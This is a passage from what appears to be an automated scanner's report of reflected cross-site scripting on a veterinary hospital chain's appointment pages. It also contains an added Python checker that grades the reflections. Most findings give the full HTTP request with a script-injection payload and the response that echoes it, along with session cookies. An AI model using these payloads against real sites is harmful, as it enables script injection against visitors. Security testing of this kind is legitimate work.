User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt4f764"><a>39ac731bfc3">
...[SNIP]...

2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5c9"><script>alert(1)</script>49734066e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1" />
...[SNIP]...
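The difference between the Firm finding in 2.84 and the Certain finding in 2.85 is the scanner's two-stage probe: a harmless tag canary (prefix"><a>suffix) first establishes that markup survives unencoded inside a double-quoted attribute, and only a reflected script canary (prefix"><script>alert(1)</script>suffix) upgrades the confidence. The following checker is an added example written for this page, not the scanner's code; the function names and the three response bodies are constructed, modelled on the snippets in 2.86 and 2.87, and the "encoded" verdict is a hypothetical fourth outcome for a host that has been fixed.

```python
import html
import re
from dataclasses import dataclass

# The two canaries the report shows, in the order a scanner would try them.
SCRIPT_PROBE = '"><script>alert(1)</script>'
TAG_PROBE = '"><a>'

# "We are inside a double-quoted attribute of an open tag": from the last
# '<' up to the reflection point there is a tag name, optional attributes,
# and an attr=" whose closing quote has not appeared yet.
_OPEN_ATTR = re.compile(r'^<[A-Za-z][^>]*\s[\w:-]+="[^"]*$')


@dataclass
class Verdict:
    confidence: str       # 'certain', 'firm', 'encoded' or 'none'
    in_quoted_attr: bool  # reflection sits inside a double-quoted attribute
    offset: int           # position of the reflection in the body, -1 if absent


def _in_quoted_attribute(body, idx):
    start = body.rfind('<', 0, idx)
    return start != -1 and _OPEN_ATTR.match(body[start:idx]) is not None


def classify_reflection(body, prefix, suffix):
    """Look for the canaries between the random prefix and suffix and grade
    the reflection the way the report's Confidence field does."""
    for confidence, probe in (('certain', SCRIPT_PROBE), ('firm', TAG_PROBE)):
        idx = body.find(prefix + probe + suffix)
        if idx != -1:
            return Verdict(confidence, _in_quoted_attribute(body, idx), idx)
    # Reflected, but with quote/angle brackets entity-encoded: not exploitable.
    idx = body.find(prefix + html.escape(SCRIPT_PROBE, quote=True) + suffix)
    if idx != -1:
        return Verdict('encoded', _in_quoted_attribute(body, idx), idx)
    return Verdict('none', False, -1)


# Constructed response bodies modelled on the report's snippets.
CERTAIN_BODY = (
    '<html><body>\n'
    '<input type="hidden" name="uri" id="uri" '
    'value="http://www.vcahospitals.com/marshfield/appt.html?'
    'fd2e3"><script>alert(1)</script>47355e93e99=1" />\n'
    '</body></html>')
FIRM_BODY = '<html>\n<body id="appt21aa2"><a>e74c5ada644">\n</body></html>'
ENCODED_BODY = (
    '<input type="hidden" name="uri" '
    'value="http://www.vcahospitals.com/marshfield/appt.html?'
    'fd2e3&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;47355e93e99=1" />')

if __name__ == '__main__':
    print(classify_reflection(CERTAIN_BODY, 'fd2e3', '47355e93e99'))
    print(classify_reflection(FIRM_BODY, '21aa2', 'e74c5ada644'))
    print(classify_reflection(ENCODED_BODY, 'fd2e3', '47355e93e99'))
```

A 'firm' verdict is not a clean bill of health: the 404 pages in 2.84, 2.86 and 2.88 still write the path segment straight into the body tag's id attribute, so any filter that happened to block the script canary should be examined by hand, as the report itself advises.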

2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21aa2"><a>e74c5ada644 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marshfield/appt.html21aa2"><a>e74c5ada644 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt21aa2"><a>e74c5ada644">
...[SNIP]...

2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /marshfield/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd2e3"><script>alert(1)</script>47355e93e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/marshfield
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.16.10.1299326665

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/marshfield/appt.html?fd2e3"><script>alert(1)</script>47355e93e99=1" />
...[SNIP]...

2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ea8b"><a>f918a068f09 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /new-york-veterinary-hospital/appt.html5ea8b"><a>f918a068f09 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:43 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt5ea8b"><a>f918a068f09">
...[SNIP]...

2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the altphone request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9ac2"><script>alert(1)</script>30c7bc9b5b5 was submitted in the altphone parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=d9ac2"><script>alert(1)</script>30c7bc9b5b5&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d
%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compat
ible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=o863b4qroqo4ij6djcsf0v35n1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="altphone" id="altphone" type="text" size="30" maxlength="20" value="d9ac2"><script>alert(1)</script>30c7bc9b5b5" />
...[SNIP]...

2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46150"><script>alert(1)</script>eaeb03d5426 was submitted in the ampm1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d
%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526reason%2525253d%25252526referer%2525253d%25252526source%2525253dnew-york-veterinary-hospital%25252526submit%2525253dRequest%2525252bAn%2525252bAppointment%25252526time1%2525253d%25252526time2%2525253d%25252526time3%2525253d%25252526token%2525253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fnew-york-veterinary-hospital%252525252fappt.html%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%2526useragent%253dMozilla%25252f4.0%252b(compat
ible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)% HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:46:12 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t5ueh83st72q06n8bhh94jq2i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM46150"><script>alert(1)</script>eaeb03d5426&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source
...[SNIP]...

2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the ampm2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c93b"><script>alert(1)</script>6aa43ad2da9 was submitted in the ampm2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM9c93b"><script>alert(1)</script>6aa43ad2da9&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=00dafb5b745078c195d9d4bb9a0d322c&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d989effced4fd802b60795345890a7d8f%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d32a72466f5237a34daf28231fdde613d%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%25253faltphone%25253d%252526ampm1%25253dAM%252526ampm2%25253dAM%252526ampm3%25253dAM%252526appt_type%25253dappt%252526client%25253dcurrent%252526date1%25253d%252526date2%25253d%252526date3%25253d%252526doctor%25253d%252526email%25253d%252526fname%25253d
%252526guid%25253d%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526reason%25253d%252526referer%25253d%252526source%25253dnew-york-veterinary-hospital%252526submit%25253dRequest%25252bAn%25252bAppointment%252526time1%25253d%252526time2%25253d%252526time3%25253d%252526token%25253d69ad90c98185c3bfbf109c1ee7f2ceae%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fnew-york-veterinary-hospital%2525252fappt.html%2525253faltphone%2525253d%25252526ampm1%2525253dAM%25252526ampm2%2525253dAM%25252526ampm3%2525253dAM%25252526appt_type%2525253dappt%25252526client%2525253dcurrent%25252526date1%2525253d%25252526date2%2525253d%25252526date3%2525253d%25252526doctor%2525253d%25252526email%2525253d%25252526fname%2525253d%25252526guid%2525253d%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526op